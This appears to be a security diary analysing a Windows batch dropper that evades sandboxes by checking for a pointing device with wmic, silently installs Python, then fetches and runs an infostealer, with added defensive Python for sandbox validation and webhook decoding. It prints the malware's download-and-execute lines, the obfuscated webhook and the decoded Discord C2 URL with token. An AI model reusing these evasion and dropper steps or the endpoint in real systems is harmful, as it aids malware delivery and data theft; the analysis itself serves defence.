Malware samples have plenty of techniques to detect whether they are running in a "safe" environment. By safe, I mean a regular computer with a user between the keyboard and the chair, programs running, and so on. These techniques are usually based on checking for the presence of specific processes, registry keys, or files. The hardware can also be a good indicator: are some devices present or not?
Some techniques rely on basic checks that can easily be implemented in a simple Windows batch (.bat) file. I found an interesting one that performs such a check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]
```batch
set "mouseConnected=false"
for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)
if not !mouseConnected! == true (
    exit /b 1
)
```
The script uses the WMI ("Windows Management Instrumentation") command-line client, wmic, to enumerate the pointing devices (the Win32_PointingDevice class) and sets the flag as soon as a single PNPDeviceID line comes back. Here is the output generated on a regular computer:
```text
C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value

PNPDeviceID=ACPI\PNP0F13\4&1BD7F811&0

PNPDeviceID=USB\VID_0E0F&PID_0003&MI_01\7&12E62A01&0&0001

PNPDeviceID=USB\VID_0E0F&PID_0003&MI_00\7&12E62A01&0&0000
```
Indeed, some basic sandboxes do not expose any pointing device at all. Easy trick! The check is crude, though: it only tests that some pointing device exists, not whether the machine is virtualized. The output above was captured in a VMware guest (USB vendor ID 0E0F belongs to VMware), and the script is perfectly happy with it. Note also that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions; Microsoft has deprecated wmic, and it is no longer installed by default on recent Windows 11 builds. In both cases the for loop produces no output, mouseConnected stays "false", and the script simply exits.
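The same check, re-implemented in Python as an added example (this is not the malware's code). It parses the `/value` output format shown above, applies the script's decision rule, and flags the VMware vendor ID the script ignores. The sample output is the one from this page, re-typed as a constant, plus an empty output standing in for a bare sandbox; the live `wmic` query is only attempted on Windows.

```python
"""Re-implementation of the mouse check above, added as an example.

Parses `wmic ... get PNPDeviceID /value` output and applies the batch
script's rule: any PNPDeviceID line at all means "real machine".
"""
import platform
import subprocess


def parse_wmic_value(output: str) -> list[dict[str, str]]:
    """Parse `wmic ... /value` output into one dict per WMI instance.

    In /value mode wmic prints KEY=VALUE lines, normally with blank lines
    between instances. A repeated key without a blank line is also treated
    as the start of a new instance; the command prompt and other lines
    without '=' are ignored.
    """
    instances, current = [], {}
    for line in output.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            if current:
                instances.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        if key in current:  # same property again: a new instance begins
            instances.append(current)
            current = {}
        current[key] = value
    if current:
        instances.append(current)
    return instances


def pointing_device_ids(output: str) -> list[str]:
    """All PNPDeviceID values in the output, in order."""
    return [i["PNPDeviceID"] for i in parse_wmic_value(output) if "PNPDeviceID" in i]


def mouse_connected(output: str) -> bool:
    """The script's rule: one PNPDeviceID line is enough to continue."""
    return bool(pointing_device_ids(output))


def is_vmware_usb_device(pnp_id: str) -> bool:
    """USB vendor ID 0E0F is registered to VMware; the script never looks at it."""
    return "VID_0E0F" in pnp_id.upper()


def query_pointing_devices() -> str:
    """Run the same wmic query live (Windows only).

    Returns '' when wmic is missing, blocked or times out, which is exactly
    the case that makes the malware exit with code 1.
    """
    if platform.system() != "Windows":
        return ""
    try:
        return subprocess.run(
            ["wmic", "path", "Win32_PointingDevice", "get", "PNPDeviceID", "/value"],
            capture_output=True, text=True, timeout=30, check=False,
        ).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return ""


# Constructed samples: the output shown on this page, and an empty output
# as produced by a sandbox with no pointing device (or with wmic blocked).
REGULAR_HOST_OUTPUT = """\
C:\\Users\\REM\\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value


PNPDeviceID=ACPI\\PNP0F13\\4&1BD7F811&0


PNPDeviceID=USB\\VID_0E0F&PID_0003&MI_01\\7&12E62A01&0&0001


PNPDeviceID=USB\\VID_0E0F&PID_0003&MI_00\\7&12E62A01&0&0000

"""
BARE_SANDBOX_OUTPUT = ""

if __name__ == "__main__":
    for name, out in (("regular host", REGULAR_HOST_OUTPUT),
                      ("bare sandbox", BARE_SANDBOX_OUTPUT)):
        ids = pointing_device_ids(out)
        vmware = [i for i in ids if is_vmware_usb_device(i)]
        print(f"{name}: mouse_connected={mouse_connected(out)} "
              f"devices={len(ids)} vmware_devices={len(vmware)}")
```

Run it on the sandbox you want to validate: if `mouse_connected(query_pointing_devices())` is False there, this sample (and anything reusing the trick) will never reach its second stage in that environment.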
If a pointing device is found, the script fetches its own copy of a minimal Python environment (a 3.10.0 release candidate from python.org, downloaded with curl --insecure, so certificate validation is skipped) and installs it silently for the current user:
```batch
set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!
```
Finally, it downloads the second stage from a paste on rentry[.]co and executes it with the freshly installed interpreter:
```batch
set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw"
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
)
python -m %OUTPUT_FILE%
del %OUTPUT_FILE%
```
(The `python -m webpage.py` invocation looks wrong, but it works: before complaining that `webpage` is not a package, Python imports it as the parent module, so the script executes anyway.) The second stage is another infostealer. Nothing special, except the way the Discord webhook used as C2 is obfuscated: it is stored as a pair of byte strings, the ciphertext followed by a 256-byte key:
```python
webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'
```
It is decoded with this simple function. The key is a permutation of the 256 possible byte values, so this is nothing more than a single-byte substitution cipher: the function builds the inverse permutation and maps every ciphertext byte through it:
```python
def DeobfuscateWeb(encrypted_text, key):
    # key is a permutation of the 256 byte values: key[p] is the ciphertext
    # byte for plaintext byte p. Build the inverse so decrypted[key[p]] == p.
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i
    # Map every ciphertext byte back through the inverse permutation
    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]
        decrypted_text.append(decrypted_char)
    return bytes(decrypted_text)
```
and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"
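The scheme above, generalized in an added example that is not the stealer's code: both directions of the substitution cipher, a validity check on the key (the original decoder silently returns garbage if the key is not a bijection on bytes), a compact decoder built on `bytes.maketrans`/`translate` that is equivalent to `DeobfuscateWeb`, and a known-plaintext recovery of key entries for samples where the key is stripped or stored elsewhere. The key and the URL below are constructed for the demonstration, not taken from the sample.

```python
"""Single-byte substitution cipher of the kind used above (added example)."""
import random


def make_key(seed: int) -> bytes:
    """A constructed 256-byte permutation, the same shape as the sample's key."""
    table = list(range(256))
    random.Random(seed).shuffle(table)
    return bytes(table)


def is_valid_key(key: bytes) -> bool:
    """The decoder only works if key is a bijection on the 256 byte values."""
    return len(key) == 256 and len(set(key)) == 256


def obfuscate(plain: bytes, key: bytes) -> bytes:
    """ciphertext[i] = key[plaintext[i]]: the direction the builder used."""
    if not is_valid_key(key):
        raise ValueError("key must be a permutation of the 256 byte values")
    return plain.translate(key)


def deobfuscate(cipher: bytes, key: bytes) -> bytes:
    """Inverse of obfuscate. Equivalent to the page's DeobfuscateWeb, but the
    inverse table comes from bytes.maketrans (key[i] -> i) instead of a loop."""
    if not is_valid_key(key):
        raise ValueError("key must be a permutation of the 256 byte values")
    inverse = bytes.maketrans(key, bytes(range(256)))
    return cipher.translate(inverse)


def recover_partial_key(cipher: bytes, known_plain: bytes) -> dict[int, int]:
    """Known-plaintext attack: each (plaintext byte, ciphertext byte) pair fixes
    one key entry, so guessing a prefix such as b"https://discord.com/api/webhooks/"
    recovers those entries without the key. Returns {plaintext_byte: key_entry}
    and raises if the pairs contradict a simple substitution."""
    partial: dict[int, int] = {}
    for p, c in zip(known_plain, cipher):
        if partial.setdefault(p, c) != c:
            raise ValueError("inconsistent pair: not a single-byte substitution")
    return partial


# Constructed inputs: a random key and a placeholder URL (not the real C2).
KEY = make_key(20240216)
URL = b"https://example.invalid/api/webhooks/0000000000/constructed-token"
CIPHER = obfuscate(URL, KEY)

if __name__ == "__main__":
    print("ciphertext:", CIPHER)
    print("decoded   :", deobfuscate(CIPHER, KEY))
    known = recover_partial_key(CIPHER, b"https://")
    print("key entries recovered from b'https://':", len(known))
```

When triaging a variant, run `is_valid_key` on the second byte string first: a key that fails it means the author changed the scheme (or the extraction mangled the bytes), and the decoder's output cannot be trusted.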
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key